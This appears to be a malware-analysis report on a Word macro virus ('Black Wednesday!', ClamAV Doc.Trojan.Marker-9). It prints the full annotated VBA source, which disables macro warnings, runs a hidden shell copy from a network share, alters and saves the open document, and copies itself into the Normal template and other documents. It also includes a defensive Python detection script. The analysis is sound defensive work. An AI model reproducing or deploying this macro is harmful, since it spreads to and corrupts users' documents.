Verdict: MALICIOUS
Risk score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample is a Word document carrying a self-replicating VBA macro (a classic Word 97-era macro virus; the string "Black Wednesday!" serves as its infection marker). On Document_Close the macro hides its activity (On Error Resume Next, ScreenUpdating off, window minimised) and disables Word's macro warning (Options.VirusProtection = False). It then uses Application.FileSearch to look for NetSetup.log on C:\ and on the share \\post\temp\1000; if the share copy exists and the local copy is missing or differs in size, it copies it with a hidden "command.com /c copy" and sets HKEY_CURRENT_USER\Control Panel\Desktop\WallPaper to c:\NetSetup.log. A destructive payload that toggles the case of 20 lines of the open document and saves it is present; its WeekDay = vbWednesday guard is commented out, so it runs on every close. Finally, if exactly one of the open document and the Normal template contains the marker, the whole code module is copied into the other (Normal template first, then any document with a drive-letter path), which is how it persists and spreads. Note that the only registry write is the WallPaper value, not a Run key, and that nothing is downloaded or executed: the only network access is the SMB file copy, and the copied file is used as a wallpaper. Because Application.FileSearch was removed in Office 2007, the copy/wallpaper stage fails silently on modern Word; the self-replication still works wherever VBA project access is allowed.
Heuristics (3)
- ClamAV: Doc.Trojan.Marker-9 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Marker-9
- VBA macros detected | medium | OLE_VBA_MACROS: document contains VBA macro code (1 related finding)
- Shell() call in VBA | critical | OLE_VBA_SHELL: Shell() call in VBA
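The three heuristics above stop at "macros present" and "Shell() present". The following triage script is an added example (editor's code, not the analyzer's) that runs over a constructed excerpt of the macro shown on this page and breaks out the behaviours that make this sample a macro virus rather than a generic dropper: the auto-exec trigger, the VirusProtection switch, VBProject/CodeModule access used for self-replication, the hidden Shell, the registry write via PrivateProfileString and the UNC share path. Rule names, severities and weights are our own invention; it also handles two VBA details that trip naive grep-based checks, line continuations (` _`) and apostrophe comments.

```python
"""Behavioural triage of an extracted VBA module (added example, not the analyzer's code)."""
import re
from dataclasses import dataclass


@dataclass
class Finding:
    rule: str
    severity: str
    line_no: int   # first physical line of the (possibly continued) statement
    text: str


# (rule, severity, regex). Rule ids and severities are our own naming.
# VBA is case-insensitive, so matching is case-insensitive too.
RULES = [
    ("AUTOEXEC_TRIGGER", "medium",
     r"\bSub\s+(Auto(Open|Close|Exec|New|Exit)|Document_(Open|Close|New)|Workbook_(Open|Close))\b"),
    ("VIRUSPROTECTION_OFF", "critical", r"Options\.VirusProtection\s*=\s*False"),
    ("VBOM_ACCESS", "critical", r"\.VBProject\.VBComponents"),
    ("SELF_REPLICATION", "critical", r"\.CodeModule\.(AddFromString|DeleteLines|InsertLines)\b"),
    ("SHELL_CALL", "critical", r"\bShell\b\s*[\"(]"),
    ("REGISTRY_WRITE", "high", r"PrivateProfileString\s*\(.*HKEY_"),
    ("UNC_PATH", "medium", r"\\\\[\w.$-]+\\[^\s\"]+"),
    ("ERROR_SUPPRESSION", "low", r"On\s+Error\s+Resume\s+Next"),
]
WEIGHTS = {"low": 1, "medium": 5, "high": 15, "critical": 30}   # our own scale


def strip_comment(line: str) -> str:
    """Drop a trailing ' comment, ignoring apostrophes inside "..." string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i].rstrip()
    return line


def logical_lines(source: str):
    """Yield (line_no, statement): ' _' continuations joined, comments removed."""
    buf, start = [], None
    for no, raw in enumerate(source.splitlines(), 1):
        line = raw.rstrip()
        if start is None:
            start = no
        if line.endswith(" _"):          # VBA line continuation
            buf.append(line[:-1])
            continue
        buf.append(line)
        yield start, strip_comment(" ".join(buf))
        buf, start = [], None
    if buf:
        yield start, strip_comment(" ".join(buf))


def scan(source: str) -> list:
    findings = []
    for no, stmt in logical_lines(source):
        if not stmt.strip():
            continue
        for rule, sev, pattern in RULES:
            if re.search(pattern, stmt, re.IGNORECASE):
                findings.append(Finding(rule, sev, no, stmt.strip()))
    return findings


def risk_score(findings) -> int:
    """Sum of weights over the distinct rules hit (each rule counted once)."""
    return sum(WEIGHTS[s] for s in {f.rule: f.severity for f in findings}.values())


def classify(findings) -> str:
    rules = {f.rule for f in findings}
    if {"AUTOEXEC_TRIGGER", "VBOM_ACCESS", "SELF_REPLICATION"} <= rules:
        return "self-replicating macro virus"
    if rules & {"SHELL_CALL", "VIRUSPROTECTION_OFF", "REGISTRY_WRITE"}:
        return "suspicious macro"
    return "macro present"


# Constructed excerpt of the macro on this page, plus one constructed comment line
# (line 7) to show that mentions inside comments do not fire.
SAMPLE = r'''
Private Sub Document_Close()
On Error Resume Next
Const Kuku = "Black Wednesday!"
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
'Switch the VirusProtection OFF
Options.VirusProtection = False
' Shell "calc.exe" mentioned only in a comment must not count
.LookIn = "\\post\temp\1000"
Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"
NormTempl.CodeModule.DeleteLines 1, a1
NormTempl.CodeModule.AddFromString MyCod
End Sub
'''.strip("\n")

if __name__ == "__main__":
    found = scan(SAMPLE)
    for f in found:
        print(f"{f.severity:8} {f.rule:20} L{f.line_no}: {f.text}")
    print("score:", risk_score(found), "verdict:", classify(found))
```

The continuation handling matters for this sample: the registry write is split over two physical lines, so a line-at-a-time regex never sees `PrivateProfileString(` and `HKEY_` together. Comment stripping is what keeps the `'Switch the VirusProtection OFF` style of commentary, and any IOC quoted in a comment, from inflating the score.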
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9953 bytes |

SHA-256: 1fff0747537d285e7214430d260014ae89468422c04a5072272a376894ea13de
Detection: ClamAV Doc.Trojan.Marker-9
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script. Lines beginning with `' analyst:` are editorial annotations and are not part of the extracted module.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' analyst: auto-exec trigger; runs every time the document is closed
Private Sub Document_Close()
' analyst: every error is swallowed, so a failed step never alerts the user
On Error Resume Next
Application.ScreenUpdating = False
ActiveWindow.WindowState = wdWindowStateMinimize
' analyst: infection marker searched for in code modules below
Const Kuku = "Black Wednesday!"
'Declare Variables
Dim SaveDoc, SaveNormalTempl, DocInfected, NormalTemplInfected As Boolean
Dim ActDoc, NormTempl As Object
Dim MyCod, UserAddress, LogData, LogFile As String
Dim a1, FileLocal, FileServer As Integer
'Initialize Variables
' analyst: VBProject access (the "VBOM") is what lets the macro read and rewrite code modules
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTempl = NormalTemplate.VBProject.VBComponents.Item(1)
DocInfected = ActDoc.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
NormalTemplInfected = NormTempl.CodeModule.Find(Kuku, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
' analyst: turns off Word's macro-warning prompt so later infected files open silently
Options.VirusProtection = False
' analyst: Application.FileSearch exists only in Word 97-2003; on newer versions this fails silently
Set fs = Application.FileSearch
With fs
.LookIn = "C:\"
.FileName = "NetSetup.log"
FileLocal = .Execute
End With
With fs
.LookIn = "\\post\temp\1000"
.FileName = "NetSetup.log"
FileServer = .Execute
End With
' analyst: copy NetSetup.log from the share when the local copy is missing or differs in size (hidden command.com window)
If FileServer > 0 Then
If (FileLocal <= 0) Then
Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
Else
If FileLen("\\post\temp\1000\NetSetup.log") <> FileLen("c:\NetSetup.log") Then
Shell "command.com /c copy \\post\temp\1000\NetSetup.log c:\NetSetup.log", vbHide
End If
End If
End If
' analyst: writes the WallPaper value under HKCU\Control Panel\Desktop; this is not a Run key
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", _
"WallPaper") = "c:\NetSetup.log"
' analyst: the Wednesday guard is commented out, so the case change and save run on every close
'If (WeekDay(Now()) = vbWednesday) Then
Selection.MoveDown Unit:=wdLine, Count:=20, Extend:=wdExtend
Selection.Range.Case = wdNextCase
ActiveDocument.Save
'End If
'Make sure that some conditions are true before we continue infecting anything
' analyst: replicate only when exactly one of document / Normal template carries the marker; the whole module is copied
If (DocInfected = True Xor NormalTemplInfected = True) And _
(ActiveDocument.SaveFormat = wdFormatDocument Or _
ActiveDocument.SaveFormat = wdFormatTemplate) Then
'Infect the NormalTemplate
If DocInfected = True Then
SaveNormalTempl = NormalTemplate.Saved
MyCod = ActDoc.CodeModule.Lines(1, ActDoc.CodeModule.CountOfLines)
a1 = NormTempl.CodeModule.CountOfLines
NormTempl.CodeModule.DeleteLines 1, a1
NormTempl.CodeModule.AddFromString MyCod
If SaveNormalTempl = True Then NormalTemplate.Save
End If
'Infect the ActiveDocument
If NormalTemplInfected = True And _
(Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
ActiveDocument.Saved = False) Then
SaveDoc = ActiveDocument.Saved
OurCode = NormTempl.CodeModule.Lines(1, NormTempl.CodeModule.CountOfLines)
a1 = ActDoc.CodeModule.CountOfLines
ActDoc.CodeModule.DeleteLines 1, a1
ActDoc.CodeModule.AddFromString OurCode
If SaveDoc = True Then ActiveDocument.Save
End If
End If
End Sub
' analyst: what follows is the p-code (opcode) disassembly of the same module stream, emitted as VBA comments
' Processing file: /opt/analyzer/scan_staging/2e3209c56e084d8e96203cce10096b5d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9230 bytes
' Line #0:
' FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitVarSpecial (False)
' Ld Application
' MemSt ScreenUpdating
' Line #4:
' Ld wdWindowStateMinimize
' Ld ActiveWindow
' MemSt WindowState
' Line #5:
' Line #6:
' Dim (Const)
' LitStr 0x0010 "Black Wednesday!"
' VarDefn Kuku
' Line #7:
' Line #8:
' QuoteRem 0x0000 0x0011 "Declare Variables"
' Line #9:
' Dim
' VarDefn SaveDoc
' VarDefn SaveNormalTempl
' VarDefn DocInfected
' VarDefn NormalTemplInfected (As Boolean)
' Line #10:
' Dim
' VarDefn ActDoc
' VarDefn NormTempl (As Object)
' Line #11:
' Dim
' VarDefn MyCod
' VarDefn UserAddress
' VarDefn LogData
' VarDefn LogFi
```

... (truncated)